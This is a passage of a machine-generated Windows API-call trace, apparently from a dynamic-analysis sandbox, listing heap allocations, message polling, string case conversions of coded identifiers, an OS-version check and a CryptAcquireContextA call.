hHeap=0x2af0000) returned 1 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0219.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0219.596] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0219.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0219.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0219.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0219.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0219.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.597] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0219.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0219.601] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.601] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.601] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0219.602] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.602] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.602] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0219.602] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.602] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0219.602] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0219.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.603] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0219.603] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.603] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.603] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.603] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0219.604] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0219.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0219.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0219.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0219.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.605] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0219.605] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0219.605] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.605] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.605] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0219.605] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.605] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0219.605] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0219.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0219.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0219.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0219.605] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c908) returned 1 [0219.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.606] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0219.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.606] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0219.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.606] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0219.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.606] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0219.607] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.607] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0219.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.607] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0219.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.607] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0219.607] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.607] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0219.607] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.607] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.607] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.607] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.607] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.608] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.608] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.608] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.608] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.608] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0219.608] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.608] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0219.608] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.608] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.608] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.608] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 